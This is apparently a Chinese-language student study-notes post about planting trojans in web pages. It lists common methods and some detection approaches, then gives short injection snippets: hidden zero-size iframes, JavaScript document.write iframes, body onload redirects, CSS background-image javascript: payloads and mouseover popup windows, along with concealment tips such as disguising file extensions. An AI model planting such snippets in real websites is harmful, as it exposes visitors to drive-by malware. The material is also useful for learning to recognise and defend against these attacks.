学习记录03(网页挂马)

学习记录03(网页挂马)网页挂马将木马程序上传到网站,使用木马生成器生成一个网马,放到网页空间,在添加代码使木马在网页打开时运行常见的几种方式将木马伪装成页面元素,木马被浏览器自动加载到本地利用脚本运行的漏洞下载木马利用脚本运行的漏洞释放隐含在网页脚本中的木马将木马伪装成缺失的组件。或和缺失的组件绑在一起(flash播放插件等)通过脚本运行调用某些com组件,利用其漏洞下载木马在渲染页面内容的过程中…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

网页挂马

将木马程序上传到网站,使用木马生成器生成一个网马,放到网页空间,在添加代码使木马在网页打开时运行

1.常见的几种方式

  • 将木马伪装成页面元素,木马被浏览器自动加载到本地
  • 利用脚本运行的漏洞下载木马
  • 利用脚本运行的漏洞释放隐含在网页脚本中的木马
  • 将木马伪装成缺失的组件。或和缺失的组件绑在一起(flash播放插件等)
  • 通过脚本运行调用某些com组件,利用其漏洞下载木马
  • 在渲染页面内容的过程中利用格式溢出释放木马(ani格式溢出漏洞等)
  • 在渲染页面内容的过程中利用格式溢出下载木马(flash9.0.115的播放漏洞等)

资料摘自:https://baike.baidu.com/item/%E7%BD%91%E9%A1%B5%E6%8C%82%E9%A9%AC/2368054?fr=aladdin

2.检测方法

  • 特征匹配:将网页挂马的脚本按脚本病毒进行检测,但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。
  • 主动防御:主动避免下载某些可能含有网马的插件,软件
  • 检查父进程是否为浏览器,这种方法很容易被躲过且会对很多插件造成误报。

资料摘自:https://baike.baidu.com/item/%E7%BD%91%E9%A1%B5%E6%8C%82%E9%A9%AC/2368054?fr=aladdin

3.常见的几种网页挂马方法

  • HTML挂马
  1. 需要利用<iframe> 标签
  2. <iframe src="地址" width="0" height="0"></iframe>
  3. 随便找一个html文件来举个例子,通常情况下将2中代码放到任何位置都可?
    :例如:当使用代码 <iframe src="地址" ></iframe>时,在这个例子里也是图片伪装挂马
    在这里插入图片描述
    :我们可以看到,在我们访问原网址时会出现我指的百度页面,但是这样太明显了
    在这里插入图片描述
    :所以最好使用<iframe src="地址" width="0" height="0"></iframe>,让设置的页面不显示出来
  • JS文件挂马
  1. 需要利用到<script></script>标签
  2. <script src="×××.js"></script>document.write("<iframe src='https://www.baidu.com/' width=0 height=0></iframe>")前者写在html文件中,后者写在js文件中
  3. 演示一下?
    :在html文件的<head>标签里加入<script src="×××.js"></script>
    在这里插入图片描述
    :转到horse.js文件,文件中添加document.write("<iframe src='https://www.baidu.com/' width=0 height=0></iframe>")这样浏览器就会执行write里面的部分
  • body挂马
  1. 利用<body>标签
  2. <body onload="window.location='地址';"></body>
  • CSS挂马
  1. 可以写在css文件里也可以直接写在html文件<style>标签里
  2. 利用background-image:url() 和连接css文件 – – > <link rel="stylesheet" type="text/css" href="./×××.css">
  3. body {background-image: url('javascript:document.write("<script src=地址></script>")')}但是有一点问题是,会出现背景页面空白的情况,导致很容易暴露,看了网上的一些总结,可以把这个修改为:body{background-image: url(t:open("地址","newwindow",这里可以加一些参数))}通过在后台开一个新的窗口来运行木马页面
  • 欺骗调用
  1. 利用一个假的链接地址诱骗用户点击或查看,以达到跳转页面加载木马的作用
  2. 例如?
<a href="http://www.4399.com/" onMouseOver="tofalse_com(); return true;"> 跳转游戏页面:http://www.4399.com/ </a>
<SCRIPT Language="JavaScript">  function tofalse_com ()  { 
         var url="https://baidu.com/";//网马的地址,这里我随便用百度试了一下 open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");//弹出一个新窗口,后面的部分是对新窗口的一些属性设置 } </SCRIPT> 
  • 伪装调用(利用隐藏的分割框架)
  1. 这还没搞chentou,先不写了?

4.补充

  • 挂马最重要的部分就是要隐蔽,像是利用js,一些插件,欺骗伪装等等就算比较隐蔽了
  • 但是还可以有一些其他的方法,例如对木马网站的url进行加密处理,利用htm文件,将js的后缀等等替换成jpg等后缀…
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/187699.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 【读书笔记】——奇点临近「建议收藏」

    做一个积极的人编码、改bug、提升自己我有一个乐园,面向编程,春暖花开!文章目录第一章 六大纪元第二章 技术进化理论:加速回归定律第三章 达到人脑的计算能力=================================================对人工智能感兴趣的伙伴,分享一个我朋友的人工智能教程。零基础!通俗易懂!风趣幽默!大家可以看看是否对自己有帮助,点击这里查看教程。…

    2022年2月28日
    45
  • navicat15激活码linux_在线激活

    (navicat15激活码linux)这是一篇idea技术相关文章,由全栈君为大家提供,主要知识点是关于2021JetBrains全家桶永久激活码的内容IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/100143.htmlS32PGH0SQB-eyJsaWN…

    2022年3月26日
    64
  • Nginx + FastCGI架构部署指导

    Nginx + FastCGI架构部署指导本文主要介绍使用Nginx+FastCGI技术,搭建一个简单的WebServer的方法。关于Nignx的相关知识,请点击此处。关于FastCGI的相关知识,请点击此处。1.概述Nginx不能像Apache那样直接执行外部的可执行程序,但是Nginx可以作为代理服务器,将Web请求转发给后端(服务器中的)应用程序,这是Nginx的主要作用之一。在本文…

    2022年7月11日
    29
  • loadrunner使用教程之IP欺骗[通俗易懂]

    loadrunner使用教程之IP欺骗[通俗易懂]上次做压力测试的时候网站崩了,老大怀疑一点原因是说我用同一个IP施压2000个用户,服务器可能拒绝了些访问请求,这样不是很靠谱。今天有空就研究了下IP欺骗,模仿多个IP里发射用户,“这样可以在很大程度上模拟实际使用中多IP访问和并测试服务器均衡处理的能力”,嗯..第一步,录制脚本,不说了,反正也是自己看。简单录制了一个查询操作的脚本。第二步,把脚本放场景中来,脚本是脚本,场景是场景,一定要

    2022年10月10日
    2
  • 404页面的制作教程「建议收藏」

    404页面的制作教程「建议收藏」近期发现很多让做SEO诊断的网站一些最基础的操作都没有做,比如首选域确定及301设置、robots.txt文件没有写、404页面没有制作及设置等。前面两项在网上信息最多,这次主要说下404页面的问题。404页面的作用是什么?404页面是为了在用户属于错误URL或网页文件被删除时提醒用户的页面,页面中可以设置网站导航、背景颜色或图片的普通网页。为的是用户没有访问到正常页面时可以…

    2022年7月27日
    18
  • 史上最强超融合入门干货:超融合与传统架构特性及收益详细对比

    史上最强超融合入门干货:超融合与传统架构特性及收益详细对比在 IT 基础架构领域工作有十年了 亲眼目睹和参与了上一代网络存储架构在中国的兴起和衰败 的确 新 IT 浪潮已经到来 超融合就是诸多风口之一 成为了近几年 IT 业界备受关注的话题 虽然超融合这个概念已经被厂商热炒了至少两年 但看到市场上依旧存在着很多模糊的定义和理解 所以想整理一些学习笔记和个人见解 希望这些干货内容能对想入门的朋友有所帮助 一 超融合的核心特征是什么 首先大家需要有

    2025年11月7日
    1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号